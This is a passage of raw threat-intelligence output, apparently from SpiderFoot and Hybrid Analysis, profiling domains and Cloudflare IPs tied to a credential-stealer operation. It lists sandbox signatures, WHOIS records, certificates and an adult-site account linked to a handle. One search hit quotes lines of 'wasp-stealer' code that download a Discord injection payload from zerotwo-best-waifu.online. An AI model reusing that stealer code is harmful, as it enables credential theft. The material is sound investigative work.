has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003756]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003820]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003820]\n "~DF34B866E6843612E2.TMP" has type "data"- Location: [%TEMP%\\~DF34B866E6843612E2.TMP]- [targetUID: 00000000-00003820]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003756]\n "0GRXRUKJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0GRXRUKJ.txt]- [targetUID: 00000000-00003820]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 
bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003756]\n "A7H64X8D.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\A7H64X8D.txt]- [targetUID: 00000000-00003756]\n "_2CC87C07-3516-11ED-BF08-08002725C4AA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "QGL6N0FI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QGL6N0FI.txt]- [targetUID: 00000000-00003820]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003756]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003820]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.96.0/"\n Pattern match: "http://188.114.96.0"\n Heuristic match: "performance.radar.cloudflare.com"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js 
HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.96.0/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.18.30.78]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "188.114.96.0": ...\n\n URL: http://188.114.96.0/ (AV positives: 6/88 scanned on 09/13/2022 13:05:36)\n URL: https://188.114.96.0/20 (AV positives: 5/88 scanned on 08/29/2022 07:42:04)\n URL: https://188.114.96.0/alternatiff/version-ax-w32.txt (AV positives: 5/88 scanned on 08/26/2022 14:30:02)\n URL: http://188.114.96.0/32 (AV positives: 5/88 scanned on 08/11/2022 04:55:54)\n URL: http://rhtradeuk.com/wp-content/plugins/coming-soon/public/fontawesome/css (AV positives: 1/88 scanned on 08/06/2022 05:33:08)\n File SHA256: 2f58ac50edbc16d8aa708d2f6b928076c3411a2fdeefa3031013148ec59ad6fe (AV positives: 5/74 scanned on 04/26/2022 14:32:35)\n File SHA256: f0bd227b5187b7171a5793bb556b41f34f8e8a37afd639aaafa33cd05dc2d66c (AV positives: 38/73 scanned on 04/21/2022 00:58:38)\n File SHA256: 03e01fa5ac22ff7a81a37166ad00b36af9419d3b9e529398d18db7d56b4087e9 (AV positives: 42/74 scanned on 04/06/2022 05:07:18)\n File SHA256: f8cd57c70b1f841df99dd7119c3b97e6d60f54a48be705d146d20ec72668980d (AV positives: 2/74 scanned on 03/26/2022 03:14:18)\n File SHA256: d022191111699963c5aa976d20f57ec096ca14d45041e254da58ac47b238a643 (AV positives: 2/72 scanned on 03/19/2022 21:57:19)\n File SHA256: 04a2e72e1b815b556294690f35a7f2cf5f5b1d2830fafc8dad0656b2150c4bab (Date: 02/15/2022 21:36:23)'}, {u'category': u'Network 
Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.96.0" found in string "http://188.114.96.0/"\n Potential IP "188.114.96.0" found in string "http://188.114.96.0"\n "188.114.96.0"\n Potential IP "188.114.96.0" found in string "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 188.114.96.0\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', 188.114.96.0 2022-12-18 00:02:39 Domain Name No SpiderFoot UI 24 0 0 0 None misogyny.wtf plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:04:28 Affiliate - Internet Name No DNS Raw Records 1 0 1 0 None journey.ns.cloudflare.com rasputain.fr 2022-12-18 00:09:24 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.7:80 188.114.96.0/24 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:8443 188.114.96.0 2022-12-18 00:12:46 Physical Location No ipapi.co 0 0 
2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3035::6815:1bf2 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None Pornhub Users (Category: XXXPORNXXX) https://www.pornhub.com/users/rasputain rasputain 2022-12-18 00:02:47 Raw Data from RIRs No grep.app 0 0 1 0 None {u'repo': {u'raw': u'aceeontop/wasp-stealer'}, u'total_matches': {u'raw': u'1'}, u'content': {u'snippet': u'
472
 os.makedirs(end_path+"\\\\W4SPStealer")
473
 paylaod = urlopen("http://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection").read().decode("utf8").replace("%WEBHOOK%",hook).replace("%IP%",f"{getip()}")
'}, u'branch': {u'raw': u'main'}, u'path': {u'raw': u'OldWaspsVersions/wasp-1.1.2.py'}, u'id': {u'raw': u'g/aceeontop/wasp-stealer/main/OldWaspsVersions/wasp-1.1.2.py'}, u'owner_id': {u'raw': u'89152258'}} zerotwo-best-waifu.online 2022-12-18 00:18:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.12:443 188.114.97.0/24 2022-12-18 00:02:43 SSL Certificate - Issued by No CertSpotter 0 0 1 0 None C=US,O=Let's Encrypt,CN=E1 plague.fun 2022-12-18 00:09:19 Open TCP Port No LeakIX 0 0 2 0 None 172.67.137.37:80 172.67.137.37 2022-12-18 00:26:49 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: plague.org Registry Domain ID: 8bd26273e60b490495d081f7f0b8a64c-LROR Registrar WHOIS Server: whois.tucows.com Registrar URL: http://www.tucows.com Updated Date: 2022-10-17T05:18:28Z Creation Date: 1998-12-17T05:00:00Z Registry Expiry Date: 2023-12-17T05:00:00Z Registrar: Tucows Domains Inc. Registrar IANA ID: 69 Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +1.4165350123 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Contact Privacy Inc. Customer 014119788 Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.stabletransit.com Name Server: dns2.stabletransit.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. 
You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Domain Name: PLAGUE.ORG Registry Domain ID: D3094865-LROR Registrar WHOIS Server: whois.tucows.com Registrar URL: http://tucowsdomains.com Updated Date: 2022-10-12T05:18:07 Creation Date: 1998-12-17T05:00:00 Registrar Registration Expiration Date: 2023-12-17T05:00:00 Registrar: TUCOWS, INC. Registrar IANA ID: 69 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Contact Privacy Inc. Customer 014119788 Registrant Organization: Contact Privacy Inc. Customer 014119788 Registrant Street: 96 Mowat Ave Registrant City: Toronto Registrant State/Province: ON Registrant Postal Code: M6K 3M1 Registrant Country: CA Registrant Phone: +1.4165385457 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: plague.org@contactprivacy.com Registry Admin ID: Admin Name: Contact Privacy Inc. Customer 014119788 Admin Organization: Contact Privacy Inc. 
Customer 014119788 Admin Street: 96 Mowat Ave Admin City: Toronto Admin State/Province: ON Admin Postal Code: M6K 3M1 Admin Country: CA Admin Phone: +1.4165385457 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: plague.org@contactprivacy.com Registry Tech ID: Tech Name: Contact Privacy Inc. Customer 014119788 Tech Organization: Contact Privacy Inc. Customer 014119788 Tech Street: 96 Mowat Ave Tech City: Toronto Tech State/Province: ON Tech Postal Code: M6K 3M1 Tech Country: CA Tech Phone: +1.4165385457 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: plague.org@contactprivacy.com Name Server: dns2.stabletransit.com Name Server: dns1.stabletransit.com DNSSEC: unsigned Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +1.4165350123 URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< "For more information on Whois status codes, please visit https://icann.org/epp" The Data in the Tucows Registrar WHOIS database is provided to you by Tucows for information purposes only, and may be used to assist you in obtaining information about or related to a domain name's registration record. Tucows makes this information available "as is," and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass, unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of any Registry Operator or ICANN-Accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. 
The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of Tucows. Tucows reserves the right to terminate your access to the Tucows WHOIS database in its sole discretion, including without limitation, for excessive querying of the WHOIS database or for failure to otherwise abide by this policy. Tucows reserves the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. NOTE: THE WHOIS DATABASE IS A CONTACT DATABASE ONLY. LACK OF A DOMAIN RECORD DOES NOT SIGNIFY DOMAIN AVAILABILITY. plague.org 2022-12-18 00:20:59 Open TCP Port No Censys 0 0 2 0 None 2606:4700:3033::6815:1cf0:80 2606:4700:3033::6815:1cf0 2022-12-18 00:12:47 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.96.3', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.96.3 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WLAN (Net ID: 00:01:24:F2:6F:6D) 37.7803446,-122.3906132 2022-12-18 00:04:11 SSL Certificate - Issued by No SSL Certificate Analyzer 0 0 2 0 None C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 188.114.97.1 2022-12-18 00:18:35 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.15:8080 188.114.97.0/24 2022-12-18 00:02:43 SSL Certificate - Raw Data No CertSpotter 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial 
Number: 04:43:a4:7d:29:1f:15:0e:6b:ac:86:e4:4b:c0:be:69:71:a9 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 6 20:16:48 2022 GMT Not After : Jan 4 20:16:47 2023 GMT Subject: CN=hook.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:f0:6d:9d:3e:65:e2:27:e7:f9:e7:b1:43:5d:9b: 9c:71:a3:74:87:8a:60:c8:7f:29:27:0c:3b:70:18: 0e:65:ff:e2:e4:6c:b2:93:6d:33:61:6a:bf:38:4f: 05:cd:5b:2e:49:18:0c:c5:32:5e:a6:f8:13:92:a2: 54:15:20:f1:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 2D:72:09:99:1A:17:4B:10:83:60:E6:EB:30:F2:51:56:F6:45:4B:C4 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:hook.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DF:A5:5E:AB:68:82:4F:1F:6C:AD:EE:B8:5F:4E:3E:5A: EA:CD:A2:12:A4:6A:5E:8E:3B:12:C0:20:44:5C:2A:73 Timestamp : Oct 6 21:16:48.471 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:B6:95:B7:C7:1C:80:2B:FD:7A:41:2D: D1:EE:2B:F0:0C:C7:D5:AD:4A:C9:E0:25:F1:61:3A:42: F4:C7:98:23:BC:02:21:00:B0:8C:72:F0:4F:8A:E8:6C: E9:F6:34:39:22:96:3C:C5:FF:9B:84:63:71:CD:62:74: 2D:25:B6:5D:82:07:80:00 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Oct 6 21:16:48.762 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 
30:46:02:21:00:DA:81:A7:33:FB:84:F9:8B:E8:59:67: 5A:B3:BB:7D:23:4E:13:C6:1F:EE:CC:11:CA:90:D9:C7: C2:B8:84:2C:2D:02:21:00:A5:46:C0:7E:74:96:53:9F: 09:9C:0C:0A:E5:A6:43:B1:BB:DE:4F:9A:14:FF:CA:3E: 71:1D:06:51:72:4F:0A:A0 Signature Algorithm: sha256WithRSAEncryption 55:5a:e5:d4:fc:c1:91:97:fc:62:bf:e7:7d:ab:bf:5e:2a:ad: c4:a2:38:e6:93:85:38:b7:1d:d3:de:32:0e:e2:4c:99:4d:11: 27:08:6e:c9:87:6b:86:71:63:52:48:6f:97:81:d6:f9:d3:dc: 30:6a:31:71:f9:50:72:a5:5c:59:fc:73:29:d0:b8:38:7a:27: 41:b3:38:31:80:5b:74:88:40:5c:51:13:29:ba:41:ab:49:a7: e8:e8:a1:04:15:8b:d3:c3:02:3a:31:08:81:2e:a2:e2:41:9c: f5:7c:f1:58:bd:ec:4c:d9:0f:e7:c3:72:72:de:1f:50:66:17: 23:e5:df:b5:36:49:5e:e1:af:17:75:d9:18:54:94:ad:e0:ae: 38:ac:2c:09:c5:01:1b:8f:32:6d:7c:38:3e:2d:4f:0d:f7:64: fd:89:7a:f0:42:66:14:a5:26:b2:2b:cf:14:ba:10:2f:cc:af: d0:b7:ba:7a:29:73:d4:f3:c1:81:fe:b4:29:3b:c6:4b:56:c8: 19:d2:3a:d5:73:1c:13:73:cf:59:a2:f3:e1:26:e5:8e:fe:04: 40:3b:31:4f:84:d4:d1:f1:ca:a5:a1:c2:9f:31:f4:54:e2:fe: 50:4a:40:71:15:f7:ff:77:5d:a2:45:82:9e:19:be:52:a9:21: 85:4e:41:e2 plague.fun 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:2096 188.114.96.0 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77aaa4331c29fd8a-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.97.1 2022-12-18 00:16:56 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 2 0 None Blocked by CloudFlare DNS [webmail.zerotwo-best-waifu.online] webmail.zerotwo-best-waifu.online 2022-12-18 00:17:00 HTTP Status Code No Web Spider 0 0 4 0 None 200 http://webmail.zerotwo-best-waifu.online/js/vendor/bootstrap.min.js 2022-12-18 00:12:06 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', 
u'ip': u'104.21.28.240', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'104.21.0.0/19', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 104.21.28.240 2022-12-18 00:05:49 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 16, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://themozigames.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"themozigames.repl.co"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "142.250.189.202:443"\n "142.250.191.67:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as 
clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2268:120:WilError_01"\n "Local\\SM0:2312:304:WilStaging_02"\n "Local\\SM0:2312:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:2268:304:WilStaging_02"\n "Local\\SM0:2268:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2268:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6720:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\2268_478418729\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00002268]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2268_1205038581\\Part-RU]- [targetUID: 00000000-00002268]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\2268_478418729\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00002268]\n "000003.log" has type 
"data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\000003.log]- [targetUID: 00000000-00002268]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\2268_1205038581\\Part-NL]- [targetUID: 00000000-00002268]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2268_1812474118\\product_page.js]- [targetUID: 00000000-00002268]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002268]\n "548de883-9607-4926-9804-27e29264f951.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\548de883-9607-4926-9804-27e29264f951.tmp]- [targetUID: 00000000-00007596]\n "f_00023e" has type "PNG image data 1761 x 991 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00007596]\n "Session_13314706105756620" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Session_13314706105756620]- [targetUID: 00000000-00002268]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002268]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.33\\Ruleset Data]- [targetUID: 00000000-00002268]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Kids Mode\\0.0.0.10\\manifest.fingerprint]- [targetUID: 00000000-00002268]\n "f_00023d" has type "PNG image data 1761 x 991 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n 
